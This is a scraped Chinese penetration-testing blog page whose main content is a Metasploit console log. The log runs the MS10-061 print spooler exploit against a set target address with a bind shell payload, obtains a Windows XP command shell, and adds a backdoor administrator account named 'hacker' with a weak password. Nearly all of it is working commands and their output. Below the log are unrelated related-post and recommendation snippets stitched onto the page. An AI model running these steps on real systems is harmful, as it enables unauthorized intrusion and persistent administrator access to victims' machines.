[*] Please wait while the Metasploit Pro Console initializes...

[*] Starting Metasploit Console...

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM

MMMMMMMMMMM MMMMMMMMMM

MMMN$ vMMMM

MMMNl MMMMM MMMMM JMMMM

MMMNl MMMMMMMN NMMMMMMM JMMMM

MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM

MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM

MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM

MMMNI MMMMM MMMMMMM MMMMM jMMMM

MMMNI MMMMM MMMMMMM MMMMM jMMMM

MMMNI MMMNM MMMMMMM MMMMM jMMMM

MMMNI WMMMM MMMMMMM MMMM# JMMMM

MMMMR ?MMNM MMMMM .dMMMM

MMMMNm `?MMM MMMM` dMMMMM

MMMMMMN ?MM MM? NMMMMMN

MMMMMMMMNe JMMMMMNMMM

MMMMMMMMMMNm, eMMMMMNMMNMM

MMMMNNMNMMMMMNx MMMMMMNMMNMMNM

MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM

=[ metasploit v4.4.0-dev [core:4.4 api:1.0]

+ -- --=[ 840 exploits - 495 auxiliary - 146 post

+ -- --=[ 250 payloads - 27 encoders - 8 nops

[*] Successfully loaded plugin: pro

msf > search ms10_061

Matching Modules

================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

exploit/windows/smb/ms10_061_spoolss 2010-09-14 excellent Microsoft Print Spooler Service Impersonation

Vulnerability

msf > use exploit/windows/smb/ms10_061_spoolss

msf exploit(ms10_061_spoolss) > info

Name: Microsoft Print Spooler Service Impersonation Vulnerability

Module: exploit/windows/smb/ms10_061_spoolss

Version: 14976

Platform: Windows

Privileged: Yes

License: Metasploit Framework License (BSD)

Rank: Excellent

Provided by:

jduck <jduck@metasploit.com>

hdm <hdm@metasploit.com>

Available targets:

Id Name

-- ----

0 Windows Universal

Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

PNAME no The printer share name to use on the target

RHOST yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE spoolss no The named pipe for the spooler service

Payload information:

Space: 1024

Avoid: 0 characters

Description:

This module exploits the RPC service impersonation vulnerability

detailed in Microsoft Bulletin MS10-061. By making a specific DCE

RPC request to the StartDocPrinter procedure, an attacker can

impersonate the Printer Spooler service to create a file. The

working directory at the time is %SystemRoot%\system32. An attacker

can specify any file name, including directory traversal or full

paths. By sending WritePrinter requests, an attacker can fully

control the content of the created file. In order to gain code

execution, this module writes to a directory used by Windows

Management Instrumentation (WMI) to deploy applications. This

directory (Wbem\Mof) is periodically scanned and any new .mof files

are processed automatically. This is the same technique employed by

the Stuxnet code found in the wild.

References:

http://www.osvdb.org/67988

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729

http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx

msf exploit(ms10_061_spoolss) > set RHOST 142.168.2.20

RHOST => 142.168.2.20

msf exploit(ms10_061_spoolss) > set PAYLOAD windows/shell/bind_tcp

PAYLOAD => windows/shell/bind_tcp

msf exploit(ms10_061_spoolss) > info

Name: Microsoft Print Spooler Service Impersonation Vulnerability

Module: exploit/windows/smb/ms10_061_spoolss

Version: 14976

Platform: Windows

Privileged: Yes

License: Metasploit Framework License (BSD)

Rank: Excellent

Provided by:

jduck <jduck@metasploit.com>

hdm <hdm@metasploit.com>

Available targets:

Id Name

-- ----

0 Windows Universal

Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

PNAME no The printer share name to use on the target

RHOST 142.168.2.20 yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE spoolss no The named pipe for the spooler service

Payload information:

Space: 1024

Avoid: 0 characters

Description:

This module exploits the RPC service impersonation vulnerability

detailed in Microsoft Bulletin MS10-061. By making a specific DCE

RPC request to the StartDocPrinter procedure, an attacker can

impersonate the Printer Spooler service to create a file. The

working directory at the time is %SystemRoot%\system32. An attacker

can specify any file name, including directory traversal or full

paths. By sending WritePrinter requests, an attacker can fully

control the content of the created file. In order to gain code

execution, this module writes to a directory used by Windows

Management Instrumentation (WMI) to deploy applications. This

directory (Wbem\Mof) is periodically scanned and any new .mof files

are processed automatically. This is the same technique employed by

the Stuxnet code found in the wild.

References:

http://www.osvdb.org/67988

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729

http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx

msf exploit(ms10_061_spoolss) > exploit

[*] Started bind handler

[*] Trying target Windows Universal...

[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:142.168.2.20[\spoolss] ...

[*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:142.168.2.20[\spoolss] ...

[*] Attempting to exploit MS10-061 via \\142.168.2.20\SmartPrinter ...

[*] Printer handle: 00000000950606c7fee7b348bc5b841597479b61

[*] Job started: 0x4

[*] Wrote 73802 bytes to %SystemRoot%\system32\9o43IDgKLE0SjU.exe

[*] Job started: 0x5

[*] Wrote 2224 bytes to %SystemRoot%\system32\wbem\mof\vWMbWpPJt8K6aD.mof

[*] Everything should be set, waiting for a session...

[*] Sending stage (240 bytes) to 142.168.2.20

Microsoft Windows XP [???? 5.1.2600]

(C) ???????? 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user

net user

\\ ??????????

-------------------------------------------------------------------------------

Administrator Guest HelpAssistant

IUSR_INTRA-PC IWAM_INTRA-PC shentouceshiwy

SUPPORT_388945a0

????????????????????????????????????

C:\WINDOWS\system32>net user hacker 123 /add & net localgroup administrators hacker /add

net user hacker 123 /add & net localgroup administrators hacker /add

??????????????

??????????????

C:\WINDOWS\system32>net user

net user

\\ ??????????

-------------------------------------------------------------------------------

Administrator Guest hacker

HelpAssistant IUSR_INTRA-PC IWAM_INTRA-PC

shentouceshiwy SUPPORT_388945a0

????????????????????????????????????

C:\WINDOWS\system32>

渗透杂记-2013-07-13 ms10_061_spoolss的更多相关文章

  1. http://www.cnblogs.com/younggun/archive/2013/07/16/3193800.html

    http://www.cnblogs.com/younggun/archive/2013/07/16/3193800.html

  2. http://www.ruanyifeng.com/blog/2013/07/gpg.html

    http://www.ruanyifeng.com/blog/2013/07/gpg.html

  3. 多线程博文地址 http://www.cnblogs.com/nokiaguy/archive/2008/07/13/1241817.html

    http://www.cnblogs.com/nokiaguy/archive/2008/07/13/1241817.html

  4. <2013 07 31> 没有必然的理由

    <2013 07 31> 没有必然的理由 没有必然的理由 人类从野蛮走向文明 也可能,从野蛮走向更野蛮 没有必然的理由 人群从疯狂走向理智 也可能,从疯狂走向更疯狂 没有必然的理由 你我从 ...

  5. 渗透杂记-2013-07-13 关于SMB版本的扫描

    smb2的溢出,其实在metasploit里面有两个扫描器可以用,效果都差不多,只是一个判断的更加详细,一个只是粗略的判断. Welcome to the Metasploit Web Console ...

  6. 渗透杂记-2013-07-13 windows/mssql/mssql_payload

    扫描一下 Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间 NSE: Loaded 49 scripts f ...

  7. 渗透杂记-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

    Welcome to the Metasploit Web Console! | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ ...

  8. <2013 07 06> "极路由" 与 “家庭服务器” 报道两则

    跟我做!打造家庭服务器 很久没有更新了,因为之前托朋友帮我弄的mini PC终于到手了.阴差阳错地,原来只打算弄一台将就可用的低功耗下载机,结果到手的却是一台支持1080p(宣称,还没烧过),还带遥控 ...

  9. Cheatsheet: 2013 07.21 ~ 07.31

    Mobile Android vs. iOS: Comparing the Development Process of the GQueues Mobile Apps Android Studio ...

随机推荐

  1. CentOS7.2 创建本地YUM源和局域网YUM源

    1背景 由于开发环境只有局域网,没法使用网上的各种YUM源,来回拷贝rpm包安装麻烦,还得解决依赖问题. 想着搭建个本地/局域网YUM源,方便自己跟同事安装软件. 2环境 [root@min-base ...

  2. 第二篇:白话tornado源码之待请求阶段

    上篇<白话tornado源码之一个脚本引发的血案>用上帝视角多整个框架做了一个概述,同时也看清了web框架的的本质,下面我们从tornado程序的起始来分析其源码. 概述 上图是torna ...

  3. CentOS 7使用nmcli配置双网卡聚合

    进入CentOS 7以后,网络方面变化比较大,例如eth0不见了,ifconfig不见了,其原因是网络服务全部都由NetworkManager管理了,下面记录下今天下午用nmcli配置的网卡聚合,网络 ...

  4. Oracle同一数据库实例不同用户间的数据迁移

    1.目标用户登录,创建自我连接的DB LINK -- Create database link create public database link MYLINK connect to 原用户名 u ...

  5. react 调用 native 的callShareAllFunc()方法,实现分享

    let shareName = { '0': '微信', '1': '朋友圈', '2': '新浪微博', '3': ' QQ', '4': 'QQ空间'};render(){ //分享YztApp. ...

  6. APP测试要点

    APP测试的时候,建议让开发打好包APK和IPA安装包,测试人员自己安装应用,进行测试.在测试过程中需要注意的测试点如下: 1.安装和卸载 ●应用是否可以在IOS不同系统版本或android不同系统版 ...

  7. iis部署文件支持svg

    今测试的一个asp网站代码,在本地一切正常,可是上传到服务器上之后就发现一些图标不显示了.图片在文件路径存在,但是访问不了,经查询.svg的图片想要在iis(iis7支持)上能正常打开,还需要做一下映 ...

  8. 关于针对class自定义new操作符失败的函数处理

    #include <iostream> #include <new> using namespace std; class CSaveCurHandler //用于管理new_ ...

  9. js事件监听/鼠标滚轮/行为/冒泡/键盘的兼容性写法

    addEvent:function(el,type,fn,capture) { if (window.addEventListener) { if (type === "mousewheel ...

  10. Dev用于界面按选中列进行分组统计数据源(实用技巧)

    如果有用U8的可以明白这个功能就是模仿他的统计功能.我不过是把他造成通用的与适应于DEV的. (效率为6000条数据分组统计时间为3秒左右分组列过多5秒.1000条以下0.几秒,500条下0.00几秒 ...